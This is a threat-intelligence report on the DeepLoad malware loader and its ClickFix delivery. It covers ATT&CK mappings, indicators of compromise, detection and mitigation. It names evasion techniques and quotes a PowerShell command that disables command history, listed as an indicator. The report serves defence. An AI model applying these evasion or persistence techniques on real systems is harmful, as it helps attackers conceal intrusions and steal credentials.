Full Report
A new campaign has leveraged the ClickFix social engineering tactic as a way to distribute a previously undocumented malware loader referred to as DeepLoad. "It likely uses AI-assisted obfuscation and process injection to evade static scanning, while credential theft starts immediately and captures passwords and sessions even if the primary loader is blocked," ReliaQuest researchers Thassanai
Analysis Summary
# Tool/Technique: DeepLoad
## Overview
DeepLoad is a sophisticated malware loader first documented in March 2026. It is distributed via the "ClickFix" social engineering tactic, which tricks users into executing malicious PowerShell commands under the guise of fixing browser or system issues. DeepLoad is characterized by its heavy reliance on AI-assisted obfuscation, memory-only execution, and persistent credential-harvesting capabilities.
## Technical Details
- **Type**: Malware loader / Credential Stealer
- **Platform**: Windows
- **Capabilities**: AI-assisted obfuscation, APC injection, WMI persistence, credential docking, browser extension injection, and worm-like spreading via removable media.
- **First Seen**: March 2026 (Reported by ReliaQuest)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link] (ClickFix lures)
- **[TA0002 - Execution]**
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [T1047 - Windows Management Instrumentation]
- [T1218.005 - System Binary Proxy Execution: Mshta]
- **[TA0003 - Persistence]**
- [T1546.003 - Event Triggered Execution: WMI Event Subscription]
- [T1176 - Browser Extensions]
- **[TA0005 - Defense Evasion]**
- [T1027 - Obfuscated Files or Information] (AI-generated obfuscation)
- [T1055.004 - Process Injection: Asynchronous Procedure Call]
- [T1134 - Access Token Manipulation]
- [T1562.001 - Impair Defenses: Disable or Modify Tools] (Disabling PowerShell history)
- **[TA0006 - Credential Access]**
- [T1555.003 - Credentials from Web Browsers]
- **[TA0007 - Discovery]**
- [T1120 - Peripheral Device Discovery]
- **[TA0009 - Collection]**
- [T1560 - Archive Collected Data]
- **[TA0011 - Command and Control]**
- [T1105 - Ingress Tool Transfer]
## Functionality
### Core Capabilities
- **ClickFix Delivery**: Social engineering that prompts users to copy/paste PowerShell code into the Windows Run dialog (`Win+R`).
- **Credential Harvesting**: Extracts saved browser passwords immediately upon execution.
- **Payload Hidden as System Process**: Renames its executable to `LockAppHost.exe` to mimic legitimate Windows lock screen components.
- **Memory-Only Execution**: Uses `mshta.exe` and PowerShell `Add-Type` to compile C# code into temporary DLLs in memory/temp directories to avoid signature-based detection.
### Advanced Features
- **AI-Assisted Obfuscation**: Uses AI-generated junk code and variable assignments to confuse static analysis tools.
- **APC Injection**: Injects the main payload into a suspended trusted Windows process using Asynchronous Procedure Calls, ensuring no decoded payload touches the disk.
- **WMI Persistence**: Sets up a WMI event subscription to re-infect a machine days later, breaking traditional parent-child process tracking.
- **Worm-like Spreading**: Monitors for USB devices and automatically copies itself using deceptive filenames like `ChromeSetup.lnk` or `AnyDesk.lnk`.
- **Malicious Browser Extension**: Intercepts real-time credentials typed into login pages even if the main loader is quarantined.
## Indicators of Compromise
- **File Names**: `LockAppHost.exe` (malicious version), `ChromeSetup.lnk`, `Firefox Installer.lnk`, `AnyDesk.lnk` (on removable media).
- **Network Indicators**:
- `TryCloudflare` domains (associated with secondary loaders like Kiss Loader) [Defanged: `*.trycloudflare[.]com`]
- **Behavioral Indicators**:
- Unexplained `mshta.exe` executions pointing to remote URLs.
- PowerShell disabling its own history commands (`Set-PSReadlineOption -HistorySaveStyle SaveNothing`).
- Sudden identification of new WMI event subscriptions.
- Creation of randomized DLLs in `%TEMP%` via `csc.exe` (C# compiler).
## Associated Threat Actors
- Currently unattributed (Leverages ClickFix infrastructure).
## Detection Methods
- **Behavioral Detection**: Monitor for `mshta.exe` launching PowerShell or `Add-Type` being used to compile C# code on the fly.
- **WMI Monitoring**: Scan for new/suspicious WMI Event Consumers and Filters.
- **Endpoint Monitoring**: Audit the Windows Run dialog usage and PowerShell command line arguments for specific obfuscation patterns.
- **Process Auditing**: Look for `LockAppHost.exe` running outside of its normal context or exhibiting network activity.
## Mitigation Strategies
- **User Education**: Train staff to recognize "ClickFix" lures and never copy/paste commands into the Win+R dialog from websites.
- **PowerShell Hardening**: Enable Constrained Language Mode and Script Block Logging.
- **Device Control**: Restrict or audit the use of removable media (USB) to prevent worm-like spreading.
- **Attack Surface Reduction**: Block `mshta.exe` from executing unless required for specific business applications.
## Related Tools/Techniques
- **ClickFix**: The social engineering framework used for delivery.
- **Kiss Loader**: A similar loader distributed via WebDAV and TryCloudflare domains.
- **AsyncRAT/Lumina Stealer**: Often seen in similar campaign structures.